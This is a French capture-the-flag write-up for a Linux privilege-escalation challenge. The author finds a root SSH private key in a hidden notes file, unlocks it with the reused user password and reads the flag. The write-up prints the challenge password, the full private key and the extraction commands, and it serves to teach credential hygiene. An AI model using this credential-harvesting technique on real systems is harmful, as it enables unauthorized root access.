# Poorly managed pt1

- [Poorly managed pt1](#poorly-managed-pt1)
  - [Présentation chall](#présentation-chall)
  - [Write-up](#write-up)

## Présentation chall

➜ **Name** : Poorly managed pt1

➜ **Catégorie** : ⚡ system

➜ **Contexte** :

Salut ! J'héberge quelques serveurs web pour mon usage perso. L'administration est complètement à la main, et la sécurité est sûrement assez minimale, je découvre encore les OS Linux...
J'ignore s'il est possible de faire quoique ce soit, même si je te donne mon accès SSH ! J'ai bien caché mes fichiers importants.

➜ **Détails chall**

**Point d'entrée :** connexion SSH, une IP et un port donné par team (donnée en cours), utilisateur `ctf` et mot de passe `__CTF_3fr3i_2024__`

**But :** élévation de privilèges, le flag est dans le fichier `/root/flag`

## Write-up

On se connecte en SSH à la machine :

```bash
❯ ssh ctf@ctf.efrei.wtf -p 22223
(ctf@ctf.efrei.wtf) Password: # on saisit le password __CTF_3fr3i_2024__

[...]
Last login: Wed Feb 14 12:14:04 2024 from 217.26.204.244
ctf@200624aee044:~$ # on est bien connectés
```

Sans chercher trop loin :

```bash
ctf@200624aee044:~$ pwd 
/home/ctf

ctf@200624aee044:~$ ls -al 
total 44
drwxr-xr-x 1 ctf  ctf  4096 Feb 13 08:35 .
drwxr-xr-x 1 root root 4096 Feb 13 10:50 ..
-rw------- 1 ctf  ctf  1091 Feb 14 12:17 .bash_history
-rw-r--r-- 1 ctf  ctf   220 Apr 23  2023 .bash_logout
-rw-r--r-- 1 ctf  ctf  3526 Apr 23  2023 .bashrc
-rw------- 1 ctf  ctf   817 Feb 11 15:11 .notes
-rw-r--r-- 1 ctf  ctf   807 Apr 23  2023 .profile
drwx------ 2 ctf  ctf  4096 Feb 13 08:29 .ssh
-r-------- 1 ctf  ctf   464 Feb 13 08:26 fichier
-rw-r--r-- 1 ctf  ctf   464 Feb 13 08:26 notes
```

💡 **Bizarre ce fichier .notes**

- en contexte ça parle de fichier "bien caché"
- ça doit être lui

```bash
ctf@200624aee044:~$ cat .notes 
# Machine

this machine is used to manage our webserver and our database

# Note

since i'm always forgetting my passwords, i dropped an ssh key to connect myself to the root user :

-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABAVGC6fhm
aDSahuDetoTEV9AAAAGAAAAAEAAAAzAAAAC3NzaC1lZDI1NTE5AAAAIDBpxJJn88Ua/f5l
DIolLZ7UDhv+iSnUN1RxX/8d+96ZAAAAoOwy4r9QSc0GVatjXd5pIDb/qSt2W4HCcOddj4
KE+coLB4zw+kv6QaKFakMJDevlDTs6m0bLqfvhWXNrB5SZD5YV6hkKQeoiMxZFsKhAMGQu
9TJlF3CQxHTbY6QM11KThxHEIfM4jSeFI7jxpfkkS3+2D/wGKZy1+o7ufdIm95E7qRFBpk
JnDydhakNRTzYKvdgeDfwJ/S57hTEseS8TKWw=
-----END OPENSSH PRIVATE KEY-----

hopefully, i protected it with a passphrase (password is the same as the one used to connect with the current user, but nobody will find it, it's a strong password :) )
```

💡 **Une clé privée, utilisée pour se co en tant que `root` on dirait**

- on va la récup et tenter une connexion
- il faudra apparemment saisir le même mot de passe `__CTF_3fr3i_2024__` comme passphrase de la clé

```bash
# on récupère la clé dans un fichier dédié
ctf@200624aee044:~$ cat .notes | grep BEGIN -A7 > id

# on définit des permissions restrictives
# sinon ssh refuse de se servir de la clé
ctf@200624aee044:~$ chmod 400 id

# on tente la connexion
ctf@200624aee044:~$ ssh -p 22222 -i id root@ctf.efrei.wtf 
Enter passphrase for key 'id': # saisie du password __CTF_3fr3i_2024__
[...]
root@3800aef8cc3b:~# pwd
/root
root@3800aef8cc3b:~# ls
flag
root@3800aef8cc3b:~# cat flag 
EFREI{hidd3n_file_is_not_s3cr3t_and_dont_3v3r_show_privat3_k3ys}
```

💡 **Flag !**
